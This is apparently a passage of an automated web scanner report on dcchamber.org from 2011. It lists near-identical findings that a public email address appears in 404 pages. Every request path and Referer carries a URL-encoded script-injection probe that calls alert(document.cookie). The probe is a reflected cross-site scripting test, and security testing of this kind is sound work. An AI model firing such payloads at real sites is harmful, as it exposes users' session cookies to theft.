17.34. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:34 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.35. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:22 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.36. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:24 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.37. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:18 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.38. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:20 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.39. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:23 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.40. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:16 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.41. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:15 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.42. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:18 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.43. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:25 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.44. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:20 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.45. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:28 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.46. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:25 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.47. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:15 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.48. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

